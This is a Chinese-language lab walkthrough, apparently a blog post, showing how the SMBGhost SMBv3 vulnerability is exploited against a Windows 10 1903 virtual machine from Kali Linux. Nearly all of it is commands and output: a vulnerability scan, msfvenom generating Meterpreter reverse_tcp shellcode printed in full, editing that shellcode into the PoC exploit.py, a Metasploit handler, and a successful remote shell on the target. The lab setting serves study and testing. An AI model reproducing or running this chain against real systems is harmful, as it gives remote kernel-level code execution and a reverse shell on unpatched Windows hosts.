一、环境
系统         版本             IP地址
Kali     Kali2020.1     192.168.101.129
Windows  Win10-1903版   192.168.101.128
二、实验步骤
1.上传相关软件包(SMBGhost_RCE_PoC-master、SMBGhost-master)

图片 1.png

2.查看相关软件包是否上传成功
root@kali:~# ls
公共  视频  文档  音乐  SMBGhost-master.zip
模板  图片  下载  桌面  SMBGhost_RCE_PoC-master.zip
root@kali:~#

3.解压SMBGhost-master.zip压缩包并查看该解压出的文件
root@kali:~# unzip SMBGhost-master.zip
Archive:  SMBGhost-master.zip
   creating: SMBGhost-master/
  inflating: SMBGhost-master/README.md  
  inflating: SMBGhost-master/scanner.py  
  inflating: SMBGhost-master/SMBGhost.pcap  
root@kali:~# cd SMBGhost-master/
root@kali:~/SMBGhost-master# ls
README.md  scanner.py  SMBGhost.pcap
root@kali:~/SMBGhost-master#
4.使用Python3结合SMBGhost-master中的scanner.py文件进行测试是否存在漏洞
root@kali:~/SMBGhost-master# python3 scanner.py  192.168.101.128
192.168.101.128 Vulnerable
root@kali:~/SMBGhost-master#
5.解压SMBGhost_RCE_PoC-master.zip压缩包并查看该解压出的文件root@kali:~/SMBGhost-master# cd 
root@kali:~# unzip SMBGhost_RCE_PoC-master.zip 
Archive:  SMBGhost_RCE_PoC-master.zip
f55e6abd47cb3a4f771c965053a5a92133a18781
   creating: SMBGhost_RCE_PoC-master/
  inflating: SMBGhost_RCE_PoC-master/.gitignore  
  inflating: SMBGhost_RCE_PoC-master/README.md  
  inflating: SMBGhost_RCE_PoC-master/exploit.py  
  inflating: SMBGhost_RCE_PoC-master/kernel_shellcode.asm  
  inflating: SMBGhost_RCE_PoC-master/lznt1.py  
  inflating: SMBGhost_RCE_PoC-master/smb_win.py  
root@kali:~# cd SMBGhost_RCE_PoC-master/
root@kali:~/SMBGhost_RCE_PoC-master# ls
exploit.py  kernel_shellcode.asm  lznt1.py  README.md  smb_win.py
root@kali:~/SMBGhost_RCE_PoC-master#
6.使用msfvenom工具将回显出的pyload
root@kali:~/SMBGhost_RCE_PoC-master# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.101.129 lport=9999 -b '\x00' -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=7, char=0x00)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 551 (iteration=0)
x64/xor chosen with final size 551
Payload size: 551 bytes
Final size of python file: 2688 bytes
buf =  b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05"
buf += b"\xef\xff\xff\xff\x48\xbb\x77\x55\x89\xfd\x29\x7f\x6c"
buf += b"\x86\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += b"\x8b\x1d\x0a\x19\xd9\x97\xa0\x86\x77\x55\xc8\xac\x68"
buf += b"\x2f\x3e\xd7\x21\x1d\xb8\x2f\x4c\x37\xe7\xd4\x17\x1d"
buf += b"\x02\xaf\x31\x37\xe7\xd4\x57\x1d\x02\x8f\x79\x37\x63"
buf += b"\x31\x3d\x1f\xc4\xcc\xe0\x37\x5d\x46\xdb\x69\xe8\x81"
buf += b"\x2b\x53\x4c\xc7\xb6\x9c\x84\xbc\x28\xbe\x8e\x6b\x25"
buf += b"\x14\xd8\xb5\xa2\x2d\x4c\x0d\x35\x69\xc1\xfc\xf9\x19"
buf += b"\xed\xfe\x6f\x5e\x8b\xf2\xac\x0d\x6c\x86\x77\xde\x09"
buf += b"\x75\x29\x7f\x6c\xce\xf2\x95\xfd\x9a\x61\x7e\xbc\xd6"
buf += b"\xfc\x1d\x91\xb9\xa2\x3f\x4c\xcf\x76\x85\x6a\xab\x61"
buf += b"\x80\xa5\xc7\xfc\x61\x01\xb5\x28\xa9\x21\xb7\xbe\x1d"
buf += b"\xb8\x3d\x85\x3e\xad\x4f\x7a\x14\x88\x3c\x11\x9f\x19"
buf += b"\x77\x3b\x56\xc5\xd9\x21\x3a\x55\x57\x02\x8d\xd1\xb9"
buf += b"\xa2\x3f\x48\xcf\x76\x85\xef\xbc\xa2\x73\x24\xc2\xfc"
buf += b"\x15\x95\xb4\x28\xaf\x2d\x0d\x73\xdd\xc1\xfc\xf9\x3e"
buf += b"\x34\xc7\x2f\x0b\xd0\xa7\x68\x27\x2d\xdf\x36\x0f\xc1"
buf += b"\x7e\xc5\x5f\x2d\xd4\x88\xb5\xd1\xbc\x70\x25\x24\x0d"
buf += b"\x65\xbc\xc2\x02\xd6\x80\x31\xcf\xc9\x22\xfa\xcf\x76"
buf += b"\x4c\x5e\x86\x77\x14\xdf\xb4\xa0\x99\x24\x07\x9b\xf5"
buf += b"\x88\xfd\x29\x36\xe5\x63\x3e\xe9\x8b\xfd\x0e\x70\xac"
buf += b"\x2e\x12\xd4\xc8\xa9\x60\xf6\x88\xca\xfe\xa4\xc8\x47"
buf += b"\x65\x08\x4a\x81\x88\x80\xc5\x74\xc3\x17\x6d\x87\x77"
buf += b"\x55\xd0\xbc\x93\x56\xec\xed\x77\xaa\x5c\x97\x23\x3e"
buf += b"\x32\xd6\x27\x18\xb8\x34\x64\x4e\xac\xce\x88\x95\xc1"
buf += b"\x74\xeb\x37\x93\x46\x3f\xdc\x48\xbc\x93\x95\x63\x59"
buf += b"\x97\xaa\x5c\xb5\xa0\xb8\x06\x96\x36\x0d\xc5\x74\xcb"
buf += b"\x37\xe5\x7f\x36\xef\x10\x58\x5d\x1e\x93\x53\xf2\x95"
buf += b"\xfd\xf7\x60\x80\xa2\xf3\x92\xbd\x1a\xfd\x29\x7f\x24"
buf += b"\x05\x9b\x45\xc1\x74\xcb\x32\x5d\x4f\x1d\x51\xc8\xa5"
buf += b"\x61\xf6\x95\xc7\xcd\x57\x50\x35\x76\x80\xb9\x05\x8f"
buf += b"\x55\xf7\xa8\x61\xfc\xa8\xa6\x29\xdc\x7f\x97\x69\x3e"
buf += b"\x35\xee\x77\x45\x89\xfd\x68\x27\x24\x0f\x85\x1d\xb8"
buf += b"\x34\x68\xc5\x34\x22\x24\xb0\x76\x28\x61\xf6\xaf\xcf"
buf += b"\xfe\x92\xc4\xcc\xe0\x36\xe5\x76\x3f\xdc\x53\xb5\xa0"
buf += b"\x86\x2d\x3c\x75\x8c\x41\xa2\xd6\xaa\xef\x7e\x77\x28"
buf += b"\xa1\xa5\x68\x28\x35\xee\x77\x15\x89\xfd\x68\x27\x06"
buf += b"\x86\x2d\x14\x33\xf6\x06\x70\x5c\x79\xa2\x02\xd0\xbc"
buf += b"\x93\x0a\x02\xcb\x16\xaa\x5c\xb4\xd6\xb1\x85\xba\x88"
buf += b"\xaa\x76\xb5\x28\xbc\x24\xaf\xb1\x1d\x0c\x0b\x5c\xcb"
buf += b"\x2d\x79\x90\x0d\xe3\xfd\x70\x36\xab\x44\x87\xe0\x2b"
buf += b"\xab\xd6\xaa\x6c\x86"
root@kali:~/SMBGhost_RCE_PoC-master#
7.修改exploit.py文件将第91行至127行进行删除
root@kali:~/SMBGhost_RCE_PoC-master# vim exploit.py 
root@kali:~/SMBGhost_RCE_PoC-master# cat -n exploit.py
     1  #!/usr/bin/env python
     2  
     3  import sys
     4  import socket
     5  import struct
     6  import argparse
     7  
     8  from lznt1 import compress, compress_evil
     9  from smb_win import smb_negotiate, smb_compress
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。省略
90  
    91  
    92  
    93  PML4_SELFREF = 0
    94  PHAL_HEAP = 0
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。省略
   420  if __name__ == "__main__":
   421      parser = argparse.ArgumentParser()
   422      parser.add_argument("-ip", help="IP address of target", required=True)
   423      parser.add_argument("-p", "--port", default=445, help="SMB port, \
   424                          default: 445", required=False, type=int)
   425      args = parser.parse_args()
   426  
   427      do_rce(args.ip, args.port)
root@kali:~/SMBGhost_RCE_PoC-master#
8.将上面通过msfvenom会显出的内容进行复制到exploit.py文件的第91行位置并在粘贴后的buf文件后一行写入USER_PAYLOAD = buf内容让其可以调用该文件root@kali:~/SMBGhost_RCE_PoC-master# vim exploit.py 
root@kali:~/SMBGhost_RCE_PoC-master# cat -n exploit.py
     1  #!/usr/bin/env python
     2  
     3  import sys
     4  import socket
     5  import struct
     6  import argparse
     7  
     8  from lznt1 import compress, compress_evil
     9  from smb_win import smb_negotiate, smb_compress
    10  
    11  # Use lowstub jmp bytes to signature search
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。省略
    90  
    91  buf =  b""
    92  buf += b"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05"
    93  buf += b"\xef\xff\xff\xff\x48\xbb\x77\x55\x89\xfd\x29\x7f\x6c"
    94  buf += b"\x86\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
    95  buf += b"\x8b\x1d\x0a\x19\xd9\x97\xa0\x86\x77\x55\xc8\xac\x68"
    96  buf += b"\x2f\x3e\xd7\x21\x1d\xb8\x2f\x4c\x37\xe7\xd4\x17\x1d"
    97  buf += b"\x02\xaf\x31\x37\xe7\xd4\x57\x1d\x02\x8f\x79\x37\x63"
    98  buf += b"\x31\x3d\x1f\xc4\xcc\xe0\x37\x5d\x46\xdb\x69\xe8\x81"
    99  buf += b"\x2b\x53\x4c\xc7\xb6\x9c\x84\xbc\x28\xbe\x8e\x6b\x25"
   100  buf += b"\x14\xd8\xb5\xa2\x2d\x4c\x0d\x35\x69\xc1\xfc\xf9\x19"
   101  buf += b"\xed\xfe\x6f\x5e\x8b\xf2\xac\x0d\x6c\x86\x77\xde\x09"
   102  buf += b"\x75\x29\x7f\x6c\xce\xf2\x95\xfd\x9a\x61\x7e\xbc\xd6"
   103  buf += b"\xfc\x1d\x91\xb9\xa2\x3f\x4c\xcf\x76\x85\x6a\xab\x61"
   104  buf += b"\x80\xa5\xc7\xfc\x61\x01\xb5\x28\xa9\x21\xb7\xbe\x1d"
   105  buf += b"\xb8\x3d\x85\x3e\xad\x4f\x7a\x14\x88\x3c\x11\x9f\x19"
   106  buf += b"\x77\x3b\x56\xc5\xd9\x21\x3a\x55\x57\x02\x8d\xd1\xb9"
   107  buf += b"\xa2\x3f\x48\xcf\x76\x85\xef\xbc\xa2\x73\x24\xc2\xfc"
   108  buf += b"\x15\x95\xb4\x28\xaf\x2d\x0d\x73\xdd\xc1\xfc\xf9\x3e"
   109  buf += b"\x34\xc7\x2f\x0b\xd0\xa7\x68\x27\x2d\xdf\x36\x0f\xc1"
   110  buf += b"\x7e\xc5\x5f\x2d\xd4\x88\xb5\xd1\xbc\x70\x25\x24\x0d"
   111  buf += b"\x65\xbc\xc2\x02\xd6\x80\x31\xcf\xc9\x22\xfa\xcf\x76"
   112  buf += b"\x4c\x5e\x86\x77\x14\xdf\xb4\xa0\x99\x24\x07\x9b\xf5"
   113  buf += b"\x88\xfd\x29\x36\xe5\x63\x3e\xe9\x8b\xfd\x0e\x70\xac"
   114  buf += b"\x2e\x12\xd4\xc8\xa9\x60\xf6\x88\xca\xfe\xa4\xc8\x47"
   115  buf += b"\x65\x08\x4a\x81\x88\x80\xc5\x74\xc3\x17\x6d\x87\x77"
   116  buf += b"\x55\xd0\xbc\x93\x56\xec\xed\x77\xaa\x5c\x97\x23\x3e"
   117  buf += b"\x32\xd6\x27\x18\xb8\x34\x64\x4e\xac\xce\x88\x95\xc1"
   118  buf += b"\x74\xeb\x37\x93\x46\x3f\xdc\x48\xbc\x93\x95\x63\x59"
   119  buf += b"\x97\xaa\x5c\xb5\xa0\xb8\x06\x96\x36\x0d\xc5\x74\xcb"
   120  buf += b"\x37\xe5\x7f\x36\xef\x10\x58\x5d\x1e\x93\x53\xf2\x95"
   121  buf += b"\xfd\xf7\x60\x80\xa2\xf3\x92\xbd\x1a\xfd\x29\x7f\x24"
   122  buf += b"\x05\x9b\x45\xc1\x74\xcb\x32\x5d\x4f\x1d\x51\xc8\xa5"
   123  buf += b"\x61\xf6\x95\xc7\xcd\x57\x50\x35\x76\x80\xb9\x05\x8f"
   124  buf += b"\x55\xf7\xa8\x61\xfc\xa8\xa6\x29\xdc\x7f\x97\x69\x3e"
   125  buf += b"\x35\xee\x77\x45\x89\xfd\x68\x27\x24\x0f\x85\x1d\xb8"
   126  buf += b"\x34\x68\xc5\x34\x22\x24\xb0\x76\x28\x61\xf6\xaf\xcf"
   127  buf += b"\xfe\x92\xc4\xcc\xe0\x36\xe5\x76\x3f\xdc\x53\xb5\xa0"
   128  buf += b"\x86\x2d\x3c\x75\x8c\x41\xa2\xd6\xaa\xef\x7e\x77\x28"
   129  buf += b"\xa1\xa5\x68\x28\x35\xee\x77\x15\x89\xfd\x68\x27\x06"
   130  buf += b"\x86\x2d\x14\x33\xf6\x06\x70\x5c\x79\xa2\x02\xd0\xbc"
   131  buf += b"\x93\x0a\x02\xcb\x16\xaa\x5c\xb4\xd6\xb1\x85\xba\x88"
   132  buf += b"\xaa\x76\xb5\x28\xbc\x24\xaf\xb1\x1d\x0c\x0b\x5c\xcb"
   133  buf += b"\x2d\x79\x90\x0d\xe3\xfd\x70\x36\xab\x44\x87\xe0\x2b"
   134  buf += b"\xab\xd6\xaa\x6c\x86"
   135  
   136  USER_PAYLOAD = buf
   137  
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。省略
   465  if __name__ == "__main__":
   466      parser = argparse.ArgumentParser()
   467      parser.add_argument("-ip", help="IP address of target", required=True)
   468      parser.add_argument("-p", "--port", default=445, help="SMB port, \
   469                          default: 445", required=False, type=int)
   470      args = parser.parse_args()
   471  
   472      do_rce(args.ip, args.port)
root@kali:~/SMBGhost_RCE_PoC-master#
9.初始化数据库,并进入msf工具
root@kali:~/SMBGhost_RCE_PoC-master# service postgresql start
root@kali:~/SMBGhost_RCE_PoC-master# msfdb init
[i] Database already started
[+] Creating database user 'msf'
为新角色输入的口令: 
再输入一遍: 
[+] Creating databases 'msf'
┏━(Message from Kali developers)
┃
┃ This is a minimal installation of Kali Linux, you likely
┃ want to install supplementary tools. Learn how:
┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/
┃
┃ We have kept /usr/bin/python pointing to Python 2 for backwards
┃ compatibility. Learn how to change this and avoid this message:
┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/
┃
┗━(Run “touch ~/.hushlogin” to hide this message)
[+] Creating databases 'msf_test'
┏━(Message from Kali developers)
┃
┃ This is a minimal installation of Kali Linux, you likely
┃ want to install supplementary tools. Learn how:
┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/
┃
┃ We have kept /usr/bin/python pointing to Python 2 for backwards
┃ compatibility. Learn how to change this and avoid this message:
┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/
┃
┗━(Run “touch ~/.hushlogin” to hide this message)
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema
root@kali:~/SMBGhost_RCE_PoC-master#
10.启动msf数据库,打开监听模块
root@kali:~/SMBGhost_RCE_PoC-master# msfconsole 
                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/
       =[ metasploit v5.0.71-dev                          ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > service  postgresql start
[*] exec: service  postgresql start
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.101.129
lhost => 192.168.101.129
msf5 exploit(multi/handler) > set lport 9999
lport => 9999
msf5 exploit(multi/handler) >
11.开始攻击,并查看拿到的权限
root@kali:~/SMBGhost_RCE_PoC-master# python3 exploit.py -ip 192.168.101.128
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff78f80000000
[+] found PML4 self-ref entry 197
[+] found HalpInterruptController at fffff78f80001478
[+] found HalpApicRequestInterrupt at fffff8011b6c5bb0
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at ffffcbfbc0000000
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff78000000950!
[+] Press a key to execute shellcode!
[+] overwrote HalpInterruptController pointer, should have execution shortly...
root@kali:~/SMBGhost_RCE_PoC-master#

msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.101.129:9999 
[*] Sending stage (206403 bytes) to 192.168.101.128
[*] Meterpreter session 1 opened (192.168.101.129:9999 -> 192.168.101.128:49686) at 2021-02-24 02:11:01 -0500

meterpreter > shell
Process 5968 created.
Channel 1 created.
Microsoft Windows [�汾 10.0.18362.30]
(c) 2019 Microsoft Corporation����������Ȩ����
C:\Windows\system32>ipconfig       
Windows IP ����
��̫�������� Ethernet0:
   �����ض��� DNS ��׺ . . . . . . . : 
   �������� IPv6 ��ַ. . . . . . . . : fe80::79ac:3add:3bd3:5ac7%10
   IPv4 ��ַ . . . . . . . . . . . . : 192.168.101.128
   ��������  . . . . . . . . . . . . : 255.255.255.0
   Ĭ������. . . . . . . . . . . . . : 192.168.101.2
��̫�������� ������������:
   ý��״̬  . . . . . . . . . . . . : ý���ѶϿ�����
   �����ض��� DNS ��׺ . . . . . . . : 
C:\Windows\system32>
上一篇 下一篇